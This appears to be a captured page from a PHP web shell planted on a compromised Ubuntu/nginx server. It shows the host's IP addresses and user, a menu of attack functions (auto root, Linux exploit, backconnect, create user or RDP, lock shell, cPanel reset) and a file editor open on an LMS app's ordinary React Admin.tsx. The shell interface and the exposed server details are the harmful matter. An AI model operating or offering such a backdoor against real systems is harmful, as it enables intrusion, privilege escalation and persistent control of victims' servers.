Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-client /
app /
containers /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
components
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
store
[ DIR ]
drwxrwxr-x
Admin.tsx
2.45
KB
-rwxrwxr-x
index.tsx
979
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Admin.tsx
import * as React from 'react'; import { connect } from 'react-redux'; import { actions as authActions } from 'containers/auth/store/actions'; import { saga as authSaga } from 'containers/auth/store/saga'; import logo from 'assets/img/logo.png'; import { ShowErrors } from 'containers/common/index'; import { compose } from 'redux'; import { Header ,Footer } from './index' import { adminRoutes } from 'config'; import { renderRoutes } from 'react-router-config'; interface FrontComponentProps { handleSubmit?:any; errors: any; location?:any; roleResponse?:any; history?:any; authInfo?:any; } interface FrontComponentState { [key: string]: any; uuid: string; user_id:number; loading: boolean; roleData:any, isContinue:boolean, user_token:string } class Front extends React.Component<FrontComponentProps, FrontComponentState> { public constructor(props) { super(props); this.state = { uuid: '', user_id: null, user_type: '', loading: true, roleData:[], isContinue:false, user_token:"" }; } private handleSubmit = (e) =>{ e.preventDefault(); const userInfo=this.props.location.state; const data={ uuid:userInfo.uuid, user_id:userInfo.id, user_type:this.state.user_type, user_token:userInfo.user_token, } this.props.handleSubmit(data); } public componentDidUpdate(prevProps) { const { errors,authInfo,history } = this.props; if (prevProps.errors !== errors) { if (errors.data && errors.data.success == false) this.setState({ validations: errors.data.message }); } if (prevProps.authInfo !== authInfo) { if (authInfo.data && errors.data.success == true) this.setState({ validations: errors.data.message }); } } public render() { return ( <> <Header/> <main className="dashboard-contents"> {renderRoutes(adminRoutes)} </main> <Footer/> </> ); } } const mapStateToProps = state => ({ errors: state.auth.error, authInfo: state.auth.data, }); const mapDispatchToProps = dispatch => ({ }); const withConnect = connect( mapStateToProps, null ); export default compose( withConnect )(Front);
Close